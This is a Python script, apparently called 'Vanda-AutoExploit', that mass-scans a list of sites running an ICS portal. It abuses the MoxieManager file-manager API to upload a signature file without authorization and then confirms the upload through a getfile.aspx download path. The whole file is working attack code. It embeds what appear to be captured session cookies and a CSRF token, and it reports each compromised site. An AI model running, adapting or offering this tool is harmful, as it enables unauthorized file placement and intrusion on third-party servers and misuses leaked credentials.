#!/usr/bin/env python3
import requests
import time
import sys
import re
import json
from urllib.parse import urljoin, urlparse

TARGET_FILE = "vandinha.txt"
PROBE_CONTENT = "prova do conceito por VandaTheGod salve rapaziada do discord oivin bom uai "
USER_UUID = "5d6b24cb-7bfe-4a6b-8581-4426bf0f4101"

def normalize_target(target):
    if not target.startswith(('http://', 'https://')):
        target = 'https://' + target
    return target.rstrip('/')

def get_moxie_endpoint(base_url):
    moxie_path = urljoin(base_url, "ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx")
    try:
        r = requests.get(moxie_path + "?action=language&code=en", timeout=10)
        return moxie_path if r.status_code == 200 else None
    except:
        return None

def get_correct_download_url(base_domain):
    """Retorna URL getfile.aspx CORRETA que funciona em TODOS os ICS"""
    return f"https://{base_domain}/ICS/staticpages/getfile.aspx?target=/moxiemanager/files/users/{USER_UUID}/{TARGET_FILE}"

def smart_verify(session, base_domain, cookies):
    """Verifica usando o caminho USERS correto"""
    main_url = get_correct_download_url(base_domain)
    
    try:
        print(f"    → Verificando: {main_url}")
        r = session.get(main_url, cookies=cookies, timeout=8)
        print(f"    Verify: {r.status_code} | {len(r.text)} bytes")
        
        if r.status_code == 200:
            content_ok = (PROBE_CONTENT in r.text or 
                         PROBE_CONTENT.lower() in r.text.lower() or 
                         TARGET_FILE in r.text)
            size_ok = len(r.text) < 5000 and len(r.text) > 10
            if content_ok or size_ok:
                print(f"    ✅ VULN CONFIRMADA! ({len(r.text)} bytes)")
                return True, main_url
            else:
                print(f"    ℹ️  Resposta: {r.text[:100]}...")
        return False, None
    except Exception as e:
        print(f"    Verify error: {e}")
        return False, None

def exploit_moxie(session, moxie_url, cookies, base_domain):
    print(f"    📁 Moxie encontrado")
    
    files = {'file': (TARGET_FILE, PROBE_CONTENT, 'text/plain')}
    params = {
        'action': 'upload', 
        'path': '/1085255', 
        'name': TARGET_FILE,
        'loaded': '0', 
        'total': str(len(PROBE_CONTENT)), 
        'id': 'null',
        'csrf': 'E24607903E4DC7496732F267BAD48FF35D855DA9E362AB80E0340D5B5EC5F164',
        'resolution': 'default'
    }
    
    try:
        r = session.post(moxie_url, params=params, files=files, cookies=cookies, timeout=15)
        print(f"    ⬆️  Upload: {r.status_code}")
        
        try:
            data = json.loads(r.text)
            if 'error' in data:
                msg = data['error']['message']
                if "exists" in msg.lower():
                    print("    ✅ ARQUIVO JÁ EXISTE = VULNERÁVEL!")
                    return True, get_correct_download_url(base_domain)
                print(f"    ⚠️  Error: {msg}")
            else:
                print("    ✅ Upload aceito")
        except:
            print(f"    📄 Raw: {r.text[:100]}")
        
        time.sleep(2)
        return smart_verify(session, base_domain, cookies)
        
    except Exception as e:
        print(f"    ❌ Error: {e}")
        return False, None

def main(targets_file):
    # COOKIES ATUALIZADOS com os valores fornecidos
    COOKIES = {
        '.ASPXAUTH': '169B17918AB2A77E863048D815ED34505A3FA476FE38ABAF375D76BACD466018C22ADDEB40F9A68DC042113CD797C40B331F5CFD8A2CCCC35285773E600FB30CFABD7E76F19DE2CDC815A67E34F33F48D2D1C85CD08D7257F5EE356D275D122D',
        '.sessionheartbeat': '3/30/2026 8:23:15 PM',
        'ASP.NET_SessionId': 'jrms0jrdjrs2mfaqlsucgrib',
        'SessionFixation.SecurityToken': 'vjmiZ7ksFjkYVZFZMW9LXztMXcpiQ2ZKyLznZaVSBKyXVhGj1X'
    }
    
    print("🚀 Vanda-AutoExploit v3.0 - ICS MoxieManager RCE")
    print(f"📄 {TARGET_FILE} → '{PROBE_CONTENT}' | UUID: {USER_UUID}")
    
    try:
        with open(targets_file, 'r') as f:
            targets = [normalize_target(line.strip()) for line in f if line.strip()]
    except:
        print("❌ Crie sites.txt")
        sys.exit(1)
    
    results = []
    for i, target in enumerate(targets, 1):
        print(f"\n[{i}/{len(targets)}] {target}")
        
        session = requests.Session()
        session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
            'Referer': f'{target}/ICS/',
            'Origin': target,
            'Accept': '*/*'
        })
        
        moxie_url = get_moxie_endpoint(target)
        base_domain = urlparse(target).netloc
        
        if moxie_url:
            success, vuln_url = exploit_moxie(session, moxie_url, COOKIES, base_domain)
            if success:
                print(f"  🎯 VULN! {vuln_url}")
                results.append((target, vuln_url))
            else:
                print("  ❌ Fail")
        else:
            print("  ⏭️  No Moxie")
    
    print(f"\n{'='*80}")
    print(f"🎯 RESULTADO FINAL: {len(results)}/{len(targets)} VULNERÁVEIS")
    print("\n🔗 LINKS FUNCIONAIS:")
    for target, url in results:
        print(f"  {target:<35} → {url}")
    
    print(f"\n💾 {len(results)} arquivos 'vanda.txt' implantados!")
    print("👉 Teste manual: curl -b cookies.txt URL")

if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else 'sites.txt')